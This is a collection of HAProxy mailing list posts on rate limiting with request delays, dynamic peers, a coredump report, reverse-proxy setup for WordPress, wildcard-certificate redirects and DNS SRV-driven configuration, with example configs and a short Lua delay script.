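As an aside, those kernel lines already contain enough to locate the faulting function: subtracting the mapping base address (the first number in the brackets) from the instruction pointer gives the offset inside libc, which addr2line or gdb can resolve to a symbol. A quick sketch using the first line above (the libc path is an assumption for this Ubuntu version):

```shell
# segfault at ... ip 7f1b93928c10 ... in libc-2.19.so[7f1b9388e000+1be000]
ip=0x7f1b93928c10      # faulting instruction pointer
base=0x7f1b9388e000    # libc load address from the brackets
printf 'offset inside libc: 0x%x\n' $(( ip - base ))   # prints 0x9ac10
# resolve it to a symbol name (path is an assumption):
#   addr2line -f -e /lib/x86_64-linux-gnu/libc-2.19.so 0x9ac10
```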


>
> The only one among them that I'm seeing capable of possibly having a
> side effect in unclear code parts would be this one:
>
>3d69a6029 ("BUG/MINOR: lua: Ignore the reserve to know if a channel is
> full or not")
>
> Do you use some Lua code which would involve the is_full() attribute on
> a channel ?
>
> Willy
>

Unfortunately (in context of figuring out the issue) we are not using lua
:-/
One thing I noticed though was that there was an OCSP file that had landed
by mistake inside the SSL directory HAP is loading the certificates from.
Do you think something like that can cause this to happen over the course
of time? I don't think so, but thought it worth mentioning since that was
the only diff I could see from our standard config elsewhere.

Thanks,
Igor


Re: Rate Limit per IP with queueing (delay)

2020-06-08 Thread Igor Cicimov
On Mon, Jun 8, 2020 at 5:18 PM Stefano Tranquillini 
wrote:

>
>
> On Sun, Jun 7, 2020 at 11:11 PM Илья Шипицин  wrote:
>
>>
>>
>> вс, 7 июн. 2020 г. в 19:59, Stefano Tranquillini :
>>
>>> Hello all,
>>>
>>> I'm moving to HA using it to replace NGINX and I've a question regarding
>>> how to do a Rate Limiting in HA that enables queuing the requests instead
>>> of closing them.
>>>
>>> I was able to limit per IP following those examples:
>>> https://www.haproxy.com/blog/four-examples-of-haproxy-rate-limiting/ .
>>> However, when the limit is reached, the users see the error and connection
>>> is closed.
>>>
>>> Since I come from NGINX, it has this handy feature
>>> https://www.nginx.com/blog/rate-limiting-nginx/ where connections that
>>> exceed the threshold are queued. Thus the user will still be able to do the
>>> calls but be delayed without him getting errors and keep the overall number
>>> of requests within threshold.
>>>
>>> Is there anything similar in HA? It should limit/queueing the user by
>>> IP.
>>>
>>> To explain with an example, we have two users Alice, with ip A.A.A.A
>>> and Bob with ip B.B.B.B The threshold is 30r/minute.
>>>
>>> So in 1 minute:
>>>
>>>- Alice does 20 requests. -> that's fine
>>>- Bob does 60 requests. -> the system caps the requset to 30 and
>>>then process the other 30 later on (maybe also adding timeout/delay)
>>>- Alice does 50 request -> the first 40 are fine, the next 10 are
>>>queued.
>>>- Bob does 20 requests -> they are queue after the one above.
>>>
>>> I saw that it can be done in general, by limiting the connections per
>>> host. But this will mean that it's cross IP and thus, if 500 is the limit
>>> - Alice  does 1 call
>>> - Bob does 1000 calls
>>> - Alice does another 1 call
>>> - Alice will be queued, that's not what i would like to have.
>>>
>>> is this possible? Is there anything similar that can be done?
>>>
>>
>> it is not cross IP.  I wish nginx docs would be better on that.
>>
> What do you mean?
> in nginx i do
> limit_req_zone $binary_remote_addr zone=prod:10m rate=40r/m;
> and works
>

What works? I don't see how that helps if both users are behind the same IP
address, since only the IP address is used in the rate-limit logic?

>
> first, in nginx terms it is limited by zone key. you can define key using
>> for example $binary_remote_addr$http_user_agent$ssl_client_ciphers
>> that means each unique combination of those parameters will be limited by
>> its own counter (or you can use nginx maps to construct such a zone key)
>>
>> in haproxy you can see an example of
>>
>> # Track client by base32+src (Host header + URL path + src IP)
>> http-request track-sc0 base32+src
>>
>> which also means key definition may be as flexible as you can imagine.
>>
>
> the point is, how can i cap the number of requests for a single user to
> 40r/minute for example? or any number.
>

And the point that others are trying to make is that you need something in
your request that you can use to distinguish one user from another, like an
Authorization header, a JWT token, or maybe a userID in your query string.
Then you can use that "unique" value, similar to what has been shown above,
to build the hash that becomes your rate-limit table key.
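
As a sketch of that idea (the Authorization header here is only an assumption; substitute whatever identifies your users), the tracking key can be switched from the source address to a per-user string, falling back to src when the header is absent:

```
frontend proxy
    bind *:80
    # string table so the key can be any per-user value
    stick-table type string len 128 size 100k expire 10s store http_req_rate(10s)
    http-request track-sc0 req.hdr(Authorization) if { req.hdr(Authorization) -m found }
    http-request track-sc0 src if !{ req.hdr(Authorization) -m found }
    use_backend api_delay if { sc_http_req_rate(0) gt 30 }
    use_backend api
```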


Re: Rate Limit per IP with queueing (delay)

2020-06-09 Thread Igor Cicimov
Modify your frontend from the example like this and let us know what
happens:

frontend proxy
bind *:80
stick-table type ip size 100k expire 15s store http_req_rate(10s)
http-request track-sc0 src table Abuse
use_backend api_delay if { sc_http_req_rate(0) gt 30 }
use_backend api

backend api
server api01 api01:80
server api02 api02:80
server api03 api03:80

backend api_delay
tcp-request inspect-delay 500ms
tcp-request content accept if WAIT_END
server api01 api01:80
server api02 api02:80
server api03 api03:80

Note that, as per the sliding-window rate limiting from the examples you
said you read, this limits each source IP to 30 requests over the last
10-second window. That gives you at most 180 requests per 60 seconds.


On Tue, Jun 9, 2020 at 4:47 PM Stefano Tranquillini 
wrote:

> If both users have the same IP then there's a problem, however, if the IPs
> are different nginx auto-limits the request per minute to the value given.
> i would like to achieve the same functionality in HA, or have a way to cap
> the number of calls per IP (or user or whatever) to a certain number.
> I don't really care if right now it is by IP or User via auth or JWT.
> The problem that I've is with the primitives to define this maximum number
> of calls per minute/seconds etc.
>
>
> On Tue, Jun 9, 2020 at 6:08 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>>
>>
>> On Mon, Jun 8, 2020 at 5:18 PM Stefano Tranquillini 
>> wrote:
>>
>>>
>>>
>>> On Sun, Jun 7, 2020 at 11:11 PM Илья Шипицин 
>>> wrote:
>>>
>>>>
>>>>
>>>> вс, 7 июн. 2020 г. в 19:59, Stefano Tranquillini :
>>>>
>>>>> Hello all,
>>>>>
>>>>> I'm moving to HA using it to replace NGINX and I've a question
>>>>> regarding how to do a Rate Limiting in HA that enables queuing the 
>>>>> requests
>>>>> instead of closing them.
>>>>>
>>>>> I was able to limit per IP following those examples:
>>>>> https://www.haproxy.com/blog/four-examples-of-haproxy-rate-limiting/
>>>>> . However, when the limit is reached, the users see the error and
>>>>> connection is closed.
>>>>>
>>>>> Since I come from NGINX, it has this handy feature
>>>>> https://www.nginx.com/blog/rate-limiting-nginx/ where connections
>>>>> that exceed the threshold are queued. Thus the user will still be able to
>>>>> do the calls but be delayed without him getting errors and keep the 
>>>>> overall
>>>>> number of requests within threshold.
>>>>>
>>>>> Is there anything similar in HA? It should limit/queueing the user by
>>>>> IP.
>>>>>
>>>>> To explain with an example, we have two users Alice, with ip A.A.A.A
>>>>> and Bob with ip B.B.B.B The threshold is 30r/minute.
>>>>>
>>>>> So in 1 minute:
>>>>>
>>>>>- Alice does 20 requests. -> that's fine
>>>>>- Bob does 60 requests. -> the system caps the requset to 30 and
>>>>>then process the other 30 later on (maybe also adding timeout/delay)
>>>>>- Alice does 50 request -> the first 40 are fine, the next 10 are
>>>>>queued.
>>>>>- Bob does 20 requests -> they are queue after the one above.
>>>>>
>>>>> I saw that it can be done in general, by limiting the connections per
>>>>> host. But this will mean that it's cross IP and thus, if 500 is the limit
>>>>> - Alice  does 1 call
>>>>> - Bob does 1000 calls
>>>>> - Alice does another 1 call
>>>>> - Alice will be queued, that's not what i would like to have.
>>>>>
>>>>> is this possible? Is there anything similar that can be done?
>>>>>
>>>>
>>>> it is not cross IP.  I wish nginx docs would be better on that.
>>>>
>>> What do you mean?
>>> in nginx i do
>>> limit_req_zone $binary_remote_addr zone=prod:10m rate=40r/m;
>>> and works
>>>
>>
>> What works? I don't see how that helps if both users are behind the same
>> IP address, since only the IP address is used in the rate-limit logic?
>>
>>>
>>> first, in nginx terms it is limited by zone key. you can define key
>>>> using for example $binary_remote_addr$http_user_agent$ssl_client_ciphers
>>&

Re: Rate Limit per IP with queueing (delay)

2020-06-09 Thread Igor Cicimov
On Tue, Jun 9, 2020 at 6:48 PM Stefano Tranquillini 
wrote:

> Hello,
> i didn't really get what has been changed in this example, and why.
>
> On Tue, Jun 9, 2020 at 9:46 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> Modify your frontend from the example like this and let us know what
>> happens:
>>
>> frontend proxy
>> bind *:80
>> stick-table type ip size 100k expire 15s store http_req_rate(10s)
>>
>
> sticky table is now here
>
>
>> http-request track-sc0 src table Abuse
>>
> but this refers to the other one , do I've to keep this? is it better to
> have it here or shared?
>
> use_backend api_delay if { sc_http_req_rate(0) gt 30 }
>>
>
> this is measuring that in the last 10s there are more than 30 requests,
> uses the table in this proxy here, not the abuse
>
>
>> use_backend api
>>
>> backend api
>> server api01 api01:80
>> server api02 api02:80
>> server api03 api03:80
>>
>> backend api_delay
>> tcp-request inspect-delay 500ms
>> tcp-request content accept if WAIT_END
>> server api01 api01:80
>> server api02 api02:80
>> server api03 api03:80
>>
>> Note that as per the sliding window rate limiting from the examples you
>> said you read this limits each source IP to 30 requests for the last time
>> period of 30 seconds. That gives you 180 requests per 60 seconds.
>>
>
> Yes, sorry, that's a typo, it should have been:

frontend proxy
bind *:80
stick-table type ip size 100k expire 15s store http_req_rate(10s)
http-request track-sc0 src
use_backend api_delay if { sc_http_req_rate(0) gt 30 }
use_backend api

> In this example, and what I did before, it seems the same behaviour (or at
> least per my understanding).
> so that, if a user does more than 30 requests in 10 seconds then the rest
> are slowed down by 500ms.
> right?
>
>
Correct.


> it does not really imply that there's a max number of calls per minute. in
> fact, if the users makes 500 calls in parallel from the same IP
>

It implies it indirectly: if there are 30 per 10 seconds, then there can be
a maximum of 180 per minute.

>
> - the first 30 are executed
> - the other 470 are executed but with a "penalty" of 500ms
>
> but that's it. Did i get it correctly?
>

Yes. If they get executed in the same period of 10 seconds. You can play
with the numbers and adjust to your requirements. You can delay them as in
your example or drop them.

HAProxy has more examples in other articles, like the botnet protection one
and the one about stick tables, that I also highly recommend reading. You
might find some interesting info there that can help your case.

>
> --
> *Stefano Tranquillini, *CTO/Co-Founder @ chino.io
> *Need to talk? book a slot <http://bit.ly/2LdXbZQ>*
> *Please consider the environment before printing this email - **keep it
> short <http://five.sentenc.es/> *
>
>
>


Re: Rate Limit per IP with queueing (delay)

2020-06-10 Thread Igor Cicimov
Glad you found a solution that works for you. I personally don't see any
issues with this, since Lua is lightweight and HAProxy is famous for
efficient resource management. So all should be good under "normal" usage,
and by normal I mean the traffic and usage patterns you expect from app
users that non-maliciously overstep your given limits. I cannot say what
will happen in case of a real DDoS attack and how much this buffering can
hurt you :-/; you might want to wait for a reply from one of the more
knowledgeable users or the devs.
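
One small hardening worth considering for that Lua action (a sketch, untested; the 2000ms cap is an arbitrary number): bound the computed sleep so an insistent client can never pin a stream for an arbitrarily long time, and guard against a missing variable:

```lua
function delay_request(txn)
    -- default to 0 if the variable is unset for some reason
    local rate = tonumber(txn:get_var('txn.sc_http_req_rate')) or 0
    -- cap the delay at 2000ms (assumed value, tune to taste)
    core.msleep(math.min(50 * rate, 2000))
end

core.register_action("delay_request", { "http-req" }, delay_request, 0)
```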

On Tue, Jun 9, 2020 at 10:38 PM Stefano Tranquillini  wrote:

> I may have found a solution, that's a bit more elegant (to me)
>
> The idea is to use a lua script to do some weighted sleep depending on
> data.
> the question is: "is this idea good or bad"? especially, will the
> "core.msleep"  have implications on performance for everybody?
> If someone uses all the connections available it will get all the users
> stuck, right?
>
> said so, i should cap/limit the number of connections for each user at the
> same time. but that's another story. (i guess i can create an acl with OR
> condition, if it's 30 request in 10 sec or 30 open connections)
> going back to the beginning.
>
> my lua file
>
> function delay_request(txn)
> local number1 = tonumber(txn:get_var('txn.sc_http_req_rate'))
> core.msleep(50 * number1)
> end
>
> core.register_action("delay_request", { "http-req" }, delay_request, 0);
>
> my frontend
>
> frontend proxy
> bind *:80
>
> stick-table type ip size 100k expire 10s store http_req_rate(10s)
> http-request track-sc0 src
> http-request set-var(txn.sc_http_req_rate) sc_http_req_rate(0)
> http-request lua.delay_request if { sc_http_req_rate(0) gt 30 }
> use_backend api
>
> Basically if there are more than 30 request per 10 seconds, i will make
> them wait 50*count (so starting from 1500ms up to whatever they keep
> insisting)
> does it make sense?
> do you see performance problems?
>
> On Tue, Jun 9, 2020 at 11:12 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> On Tue, Jun 9, 2020 at 6:48 PM Stefano Tranquillini 
>> wrote:
>>
>>> Hello,
>>> i didn't really get what has been changed in this example, and why.
>>>
>>> On Tue, Jun 9, 2020 at 9:46 AM Igor Cicimov <
>>> ig...@encompasscorporation.com> wrote:
>>>
>>>> Modify your frontend from the example like this and let us know what
>>>> happens:
>>>>
>>>> frontend proxy
>>>> bind *:80
>>>> stick-table type ip size 100k expire 15s store http_req_rate(10s)
>>>>
>>>
>>> sticky table is now here
>>>
>>>
>>>> http-request track-sc0 src table Abuse
>>>>
>>> but this refers to the other one , do I've to keep this? is it better to
>>> have it here or shared?
>>>
>>> use_backend api_delay if { sc_http_req_rate(0) gt 30 }
>>>>
>>>
>>> this is measuring that in the last 10s there are more than 30 requests,
>>> uses the table in this proxy here, not the abuse
>>>
>>>
>>>> use_backend api
>>>>
>>>> backend api
>>>> server api01 api01:80
>>>> server api02 api02:80
>>>> server api03 api03:80
>>>>
>>>> backend api_delay
>>>> tcp-request inspect-delay 500ms
>>>> tcp-request content accept if WAIT_END
>>>> server api01 api01:80
>>>> server api02 api02:80
>>>> server api03 api03:80
>>>>
>>>> Note that as per the sliding window rate limiting from the examples you
>>>> said you read this limits each source IP to 30 requests for the last time
>>>> period of 30 seconds. That gives you 180 requests per 60 seconds.
>>>>
>>>
>>> Yes, sorry, that's a typo, it should have been:
>>
>> frontend proxy
>> bind *:80
>> stick-table type ip size 100k expire 15s store http_req_rate(10s)
>> http-request track-sc0 src
>> use_backend api_delay if { sc_http_req_rate(0) gt 30 }
>> use_backend api
>>
>>> In this example, and what I did before, it seems the same behaviour (or
>>> at least per my understanding).
>>> so that, if a user does more than 30 requests in 10 seconds then the
>>> rest are slowed down by 500ms.
>>> right?
>>>
>>>
>> Correct.
>>
>>
>>> it does not really imply that 

Dynamic peers section

2020-08-26 Thread Igor Cicimov
Hi guys,

As we know, everything is dynamic these days, including haproxy servers
coming and going all the time in a proxy/lb tier, so I wonder if there is
any way to achieve a dynamic peers section in haproxy? Maybe via resolvers
or the data plane API? Interested to know how people are managing this
case, if it is at all possible.

Thanks,
Igor


http2 smuggling

2020-09-10 Thread Igor Cicimov
Should we be worried?

https://portswigger.net/daily-swig/http-request-smuggling-http-2-opens-a-new-attack-tunnel

IC


Re: [2.0.17] crash with coredump

2020-09-16 Thread Igor Cicimov
Hi Maciej,

On Wed, Sep 16, 2020 at 9:00 PM Maciej Zdeb  wrote:

> Hi,
>
> Our HAProxy (2.0.14) started to crash, so first we upgraded to 2.0.17 but
> it didn't help. Below you'll find traces from coredump
>
> Version:
> HA-Proxy version 2.0.17 2020/07/31 - https://haproxy.org/
> Build options :
>   TARGET  = linux-glibc
>   CPU = generic
>   CC  = gcc
>   CFLAGS  = -O0 -g -fno-strict-aliasing -Wdeclaration-after-statement
> -fwrapv -Wno-unused-label -Wno-sign-compare -Wno-unused-parameter
> -Wno-old-style-declaration -Wno-ignored-qualifiers -Wno-clobbered
> -Wno-missing-field-initializers -Wno-implicit-fallthrough
> -Wno-stringop-overflow -Wtype-limits -Wshift-negative-value
> -Wshift-overflow=2 -Wduplicated-cond -Wnull-dereference
> -DIP_BIND_ADDRESS_NO_PORT=24 -DMAX_SESS_STKCTR=12
>   OPTIONS = USE_PCRE=1 USE_PCRE_JIT=1 USE_REGPARM=1 USE_GETADDRINFO=1
> USE_OPENSSL=1 USE_LUA=1 USE_ZLIB=1 USE_DL=1
>
> Feature list : +EPOLL -KQUEUE -MY_EPOLL -MY_SPLICE +NETFILTER +PCRE
> +PCRE_JIT -PCRE2 -PCRE2_JIT +POLL -PRIVATE_CACHE +THREAD -PTHREAD_PSHARED
> +REGPARM -STATIC_PCRE -STATIC_PCRE2 +TPROXY +LINUX_TPROXY +LINUX_SPLICE
> +LIBCRYPT +CRYPT_H -VSYSCALL +GETADDRINFO +OPENSSL +LUA +FUTEX +ACCEPT4
> -MY_ACCEPT4 +ZLIB -SLZ +CPU_AFFINITY +TFO +NS +DL +RT -DEVICEATLAS
> -51DEGREES -WURFL -SYSTEMD -OBSOLETE_LINKER +PRCTL +THREAD_DUMP -EVPORTS
>
> Default settings :
>   bufsize = 16384, maxrewrite = 1024, maxpollevents = 200
>
> Built with multi-threading support (MAX_THREADS=64, default=4).
> Built with OpenSSL version : OpenSSL 1.1.1f  31 Mar 2020
> Running on OpenSSL version : OpenSSL 1.1.1f  31 Mar 2020
> OpenSSL library supports TLS extensions : yes
> OpenSSL library supports SNI : yes
> OpenSSL library supports : TLSv1.0 TLSv1.1 TLSv1.2 TLSv1.3
> Built with Lua version : Lua 5.3.5
> Built with network namespace support.
> Built with transparent proxy support using: IP_TRANSPARENT
> IPV6_TRANSPARENT IP_FREEBIND
> Built with zlib version : 1.2.11
> Running on zlib version : 1.2.11
> Compression algorithms supported : identity("identity"),
> deflate("deflate"), raw-deflate("deflate"), gzip("gzip")
> Built with PCRE version : 8.44 2020-02-12
> Running on PCRE version : 8.44 2020-02-12
> PCRE library supports JIT : yes
> Encrypted password support via crypt(3): yes
>
> Available polling systems :
>   epoll : pref=300,  test result OK
>poll : pref=200,  test result OK
>  select : pref=150,  test result OK
> Total: 3 (3 usable), will use epoll.
>
> Available multiplexer protocols :
> (protocols marked as <default> cannot be specified using 'proto' keyword)
>h2 : mode=HTTP   side=FE mux=H2
>h2 : mode=HTX    side=FE|BE mux=H2
> <default> : mode=HTX    side=FE|BE mux=H1
> <default> : mode=TCP|HTTP side=FE|BE mux=PASS
>
> Available services : none
>
> Available filters :
> [SPOE] spoe
> [COMP] compression
> [CACHE] cache
> [TRACE] trace
>
>
> Coredump fragment from thread1:
> (gdb) bt
> #0  0x55cbbf6ed64b in h2s_notify_recv (h2s=0x7f65b8b55130) at
> src/mux_h2.c:783
> #1  0x55cbbf6edbc7 in h2s_close (h2s=0x7f65b8b55130) at
> src/mux_h2.c:921
> #2  0x55cbbf6f9745 in h2s_htx_make_trailers (h2s=0x7f65b8b55130,
> htx=0x7f65a9c34f20) at src/mux_h2.c:5385
> #3  0x55cbbf6fa48e in h2_snd_buf (cs=0x7f65b8c48a40,
> buf=0x7f65d05291b8, count=2, flags=1) at src/mux_h2.c:5694
> #4  0x55cbbf7cdde3 in si_cs_send (cs=0x7f65b8c48a40) at
> src/stream_interface.c:762
> #5  0x55cbbf7ce839 in stream_int_chk_snd_conn (si=0x7f65d0529478) at
> src/stream_interface.c:1145
> #6  0x55cbbf7cc9d6 in si_chk_snd (si=0x7f65d0529478) at
> include/proto/stream_interface.h:496
> #7  0x55cbbf7cd559 in stream_int_notify (si=0x7f65d05294d0) at
> src/stream_interface.c:510
> #8  0x55cbbf7cda33 in si_cs_process (cs=0x55cbca178f90) at
> src/stream_interface.c:644
> #9  0x55cbbf7cdfb1 in si_cs_io_cb (t=0x0, ctx=0x7f65d05294d0, state=1)
> at src/stream_interface.c:817
> #10 0x55cbbf81af32 in process_runnable_tasks () at src/task.c:415
> #11 0x55cbbf740cc0 in run_poll_loop () at src/haproxy.c:2701
> #12 0x55cbbf741188 in run_thread_poll_loop (data=0x1) at
> src/haproxy.c:2840
> #13 0x7f667fbdb6db in start_thread (arg=0x7f65d5556700) at
> pthread_create.c:463
> #14 0x7f667e764a3f in clone () at
> ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
>
> (gdb) bt full
> #0  0x55cbbf6ed64b in h2s_notify_recv (h2s=0x7f65b8b55130) at
> src/mux_h2.c:783
> sw = 0x
> #1  0x55cbbf6edbc7 in h2s_close (h2s=0x7f65b8b55130) at
> src/mux_h2.c:921
> No locals.
> #2  0x55cbbf6f9745 in h2s_htx_make_trailers (h2s=0x7f65b8b55130,
> htx=0x7f65a9c34f20) at src/mux_h2.c:5385
> list = {{n = {ptr = 0x55cbbf88d18c "", len = 0}, v = {ptr =
> 0x7f65a9c34f20 "�?", len = 94333580136844}}, {n = {ptr = 0x7f65d5532410 "
> Oée\177", len = 94333579742112}, v = {ptr = 0x7f65a9c38e78 "�\001", len =
> 140074616573728}}, {n = {
>   pt

Re: Apache Proxypass mimicing ?

2021-02-21 Thread Igor Cicimov
> But if I do some configuration tweaks in "wp-config.php", like adding the
> following two lines :
> define('WP_HOME', 'https://front1.domain.local');
> define('WP_SITEURL', 'https://front1.domain.local');
>
> It seems to work correctly.
>
> It is not an acceptable solution however, as these WP instances will be
> managed by people who are not really tech-savvy.
>
> So I wonder if HAProxy could provide a setup with all the required
> modifications, rewritings, ... allowing both worlds to coexist in a
> transparent way :
> - usable WP site while browsing the "real" URLs from the backend
> - usable WP site while browsing through HAProxy.
>
> Right now WP is my concern, but I am sure this is a reusable "pattern" for
> future needs.
>
> Regards
>

This is a requirement for most apps behind a reverse proxy -- you simply
have to tell the app that it is behind a reverse proxy so it can set
correct links where needed.

In your case, if you google for "wordpress behind reverse proxy" I'm sure
you'll get a ton of resources that can point you in the right direction for
your use case, like using the X-Forwarded-* headers for example, or
whatever suits you.
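
As a minimal sketch of that (bind line, cert path, and backend name are placeholders), the usual set of forwarded headers from HAProxy would look something like:

```
frontend www
    bind *:443 ssl crt /etc/haproxy/certs/
    option forwardfor                               # adds X-Forwarded-For
    http-request set-header X-Forwarded-Proto https if { ssl_fc }
    http-request set-header X-Forwarded-Host %[req.hdr(Host)]
    default_backend wordpress
```

WordPress (or a plugin) then has to be told to trust those headers, but that is app-side configuration rather than HAProxy's job.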

Re: rewrite and redirect with haproxy

2016-11-23 Thread Igor Cicimov
On Thu, Nov 24, 2016 at 2:21 PM, Jonathan Opperman 
wrote:

> On Thu, Nov 24, 2016 at 3:59 PM, Jonathan Opperman 
> wrote:
>
>>
>> On Thu, Nov 24, 2016 at 3:28 PM, Michael Ezzell 
>> wrote:
>>
>>> On Nov 23, 2016 20:16, "Jonathan Opperman"  wrote:
>>>
>>> >> my.site.example.net/example.com -> my-site-example-net.example com
>>> >
>>> >
>>> > This, is this do-able? It will be different domains, and different
>>> level sub domains
>>> > but they will utimately end up with using *.example.com *.example2.com
>>> > certificates that terminate on the haproxy server.
>>> >
>>> > http://my.site.example.com/example.com --> http://my-site.example.com
>>> > http://my.other.site.example.com/example.com --> http://my-o
>>> ther-site.example.com
>>>
>>> This can also be done, though it's a little trickier, because you'd need
>>> to match with path_beg or path_reg and then munge the uri with regsub to
>>> remove that and potentially the initial leading slash along with the host
>>> header parts.
>>>
>> Sounds tricky :), wish there were some examples of such haproxy
>> configurations. It would be great if the manual included some
>> more 'tricky' examples like this.
>>
>>> > Thanks for this, i've tested and mine for some reason looks like the
>>> one you suggest
>>> > on the other hand:
>>> >
>>> > * Rebuilt URL to: www.test.1.example.com/
>>>
>>> > < Location: https://www-test-1-example.com.example.com/
>>>
>>> Take a look at my setup again.
>>>
>>> http-request redirect location https://%[hdr(host),regsub(\.e
>>> xample\.com$,),regsub(\.,-,g)].example.com%[capture.req.uri] if {
>>> hdr_reg(host) -i .+\..+\.example\.com$ }
>>>
>>> I believe your problem is here:
>>>
>>> hdr(host),regsub(\.example\.com$,)
>>>
>>> This first regsub needs to match .example.com at the end of the
>>> original host header, and strip it out completely by replacing it with the
>>> empty string that is hiding between , and ) at the end.
>>>
>>> If it doesn't match correctly, it would leave the .example.com in place
>>> and fail in much the way your output illustrates.
>>>
>> You are 100% correct, I had my escape at the wrong place in the domain
>> name, fixed that and works as per your example. Thanks
>> again.
>>
>>
> This only works if I access http
>
> http://www.test.1.example.com/  --> https://www-test-1.example.com/
>
> For entering
>
> https://www.test.1.example.com/ --> https://www-test-1.example.com/
>
> doesn't work in the browser, is http-request only applicable for an http
> request and not https?
>
> In curl it works, but in Chrome/Chromium it comes up with the warning
> "Your connection is not private",
> as the wildcard cert *.example.com does not match
> https://www.test.1.example.com/ and
> the redirect is not working in the browser to
> https://www-test-1.example.com/
> to match the wildcard cert.
>

Wildcard certs only work one level deep, meaning *.example.com covers
www.example.com, domain1.example.com, etc., but *not*
www.domain1.something.example.com and the like.
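
For reference, the host munge performed by that regsub chain can be mocked in plain shell, which makes it easy to test the pattern before putting it in the config (same three steps: strip the apex suffix, turn the remaining dots into dashes, re-append the apex):

```shell
host="www.test.1.example.com"
echo "$host" | sed -E 's/\.example\.com$//; s/\./-/g; s/$/.example.com/'
# prints: www-test-1.example.com
```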


Re: Confused with the health check.

2016-11-29 Thread Igor Cicimov
On 29 Nov 2016 10:11 pm, "顏靖軒"  wrote:
>
> Hello lists
>
> I have a question about the health check.
> After setting up the health check, I usually get error messages.
> The message is "Broken pipe at initial connection step of tcp-check".
> What does it mean?

The connection was interrupted by something and no reply was received by
haproxy. Any firewall?

> My server is not dead and keeps running.
> I don't think there is a network problem either.
>
> Thanks


Re: dynamic configuration via DNS SRV records

2016-12-18 Thread Igor Cicimov
On Mon, Dec 19, 2016 at 11:43 AM, jerry  wrote:

> Hi,
>
> We use haproxy quite a bit at SoundHound for fronting our various external
> and internal services. We are in the process of moving to a container-based
> deployment model. With Kubernetes in particular, it's as easy as editing 1
> line to add a new server to a replication set. In one of our applications,
> we have 50+ partitions, so when a new instance is added, it is actually
> 50+ containers and 50+ proxy configs to edit. Clearly we need to automate
> this more than we have so far.
>
> I was looking around at how to do this and came up with an unusual idea.
> Everybody uses DNS, but almost no one uses/knows about SRV records. SRV
> records have the form of
> _(service)._(protocol).name and return a target DNS name (like CNAME),
> priority, weight and destination port. This is like MX records on steroids.
>

For SRV records specifically, I'm using Consul and dnsmasq so on the
haproxy instances I can do:

$ dig +short srv tomcat.service.consul
1 1 8080 ip-192.168-0-45.node.dc-prod.consul.
1 1 8080 ip-192.168-1-226.node.dc-prod.consul.

and update the appropriate backend section of the config file and reload in
case of changes. I keep the config file "modular" meaning multiple parts
(mostly for the backends) that I can update based on some criteria and then
glue together to create the final haproxy.cfg. How you implement the
updates, the triggers, and the config file setup depends on your
architecture and needs.
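
As a sketch of that glue step (hostnames mirror the dig output above and are assumptions), SRV answers in "priority weight port target" form can be rendered straight into backend server lines:

```shell
# normally: srv=$(dig +short srv tomcat.service.consul)
srv='1 1 8080 ip-192-168-0-45.node.dc-prod.consul.
1 1 8080 ip-192-168-1-226.node.dc-prod.consul.'

echo "$srv" | awk '{
    t = $4; sub(/\.$/, "", t)                   # drop the trailing dot
    printf "    server %s %s:%s check\n", t, t, $3
}'
```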

If you google for "consul-template + haproxy" I'm sure you will also come
across several solutions.

The dynamic DNS update is coming to haproxy in version 1.7, check this
discussion for details
https://www.mail-archive.com/haproxy@formilux.org/msg23579.html


>
> This seems to have everything I need for the dynamic parts of a
> configuration. The original name defines the port to listen on (this can be
> a name that gets looked up in /etc/services or _31112 for a hard port
> number). The set of records returned is the backend set. The ones that have
> the lowest priority are active and the rest are backups. If you want to do
> per backend commands, those can be put in as TXT records for the name
> backend.system.name._(service)._(protocol).name. Similarly, dynamic parts
> of the frontend and backend could be done with TXT records for _frontend
> and _backend prefixes to the SRV name.
>
> For now, we can assume that there is only one level of backup rather than
> the arbitrary number that DNS allows.
>
> There is an extra little bit that DNS can do for us. DNS has a notify
> capability. When a zone updates, the dns server can notify its slaves with
> the new SOA record. It turns out that all you need to do is generate a
> response that is almost an exact copy of the query you got, in DNS wire
> form to make DNS happy and then do the lookups again.
>
> My thought is that the typical thing you configure for a given proxy would
> remain in the config file as now (what to check, connection mode...). The
> front end becomes the SRV name and the backend is either empty or has some
> command that says expand the SRV record and put it as the backends.
>
>
>
> The reason I like it is there are 75 different orchestration/automation
> systems that could want to drive haproxy. They all talk to DNS already.
> With this, there is a single interface that I need for the automation from
> the view of both an orchestration system and haproxy. We have a custom load
> balancer that we plan to drive the same way.
>
>
> Here are my questions:
> Do people think this is an interesting/good idea?
> Is there anything that is missing and would make this a terrible idea?
> If not fatally flawed, should this be run outside of haproxy as an
> automation tool or should haproxy do this itself?
>
> thanks,
> jerry
>
>
>


-- 
Igor Cicimov | DevOps


p. +61 (0) 433 078 728
e. ig...@encompasscorporation.com <http://encompasscorporation.com/>
w*.* www.encompasscorporation.com
a. Level 4, 65 York Street, Sydney 2000


ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-04 Thread Igor Cicimov
Hi all,

On one of my haproxy's I get the following message on reload:

[ALERT] 004/070949 (21440) : sendmsg logger #1 failed: Resource temporarily
unavailable (errno=11)

Has anyone seen this before or any pointers where to look for to correct
this?

Thanks,
Igor


Re: ALERT:sendmsg logger #1 failed: Resource temporarily unavailable (errno=11)

2017-01-05 Thread Igor Cicimov
On Fri, Jan 6, 2017 at 12:37 AM, Jeff Palmer  wrote:

> Also, it'd be great if in the future you don't put an error message as
> the subject.  Especially one that starts with ALERT in all caps.
>
> I'm sure I'm not the only person who just spent a moment looking over
> my monitoring dashboards to figure out what part of my network was in
> alarm.
>
>
>
> On Thu, Jan 5, 2017 at 8:20 AM, Patrick Hemmer 
> wrote:
> >
> >
> > On 2017/1/5 02:15, Igor Cicimov wrote:
> >
> > Hi all,
> >
> > On one of my haproxy's I get the following message on reload:
> > [ALERT] 004/070949 (21440) : sendmsg logger #1 failed: Resource
> temporarily
> > unavailable (errno=11)
> >
> > Has anyone seen this before or any pointers where to look for to correct
> > this?
> >
> > Thanks,
> > Igor
> >
> > Google has several entries on the subject:
> > https://bugs.launchpad.net/kolla/+bug/1549753
> > http://comments.gmane.org/gmane.comp.web.haproxy/4716
> >
> > -Patrick
>
>
>
> --
> Jeff Palmer
> https://PalmerIT.net
>

You are right Jeff, sorry for that, I just copy-pasted the error quickly
without thinking much about it. At least I'm sure it got everyone's
attention though, lol.

Cheers,
Igor


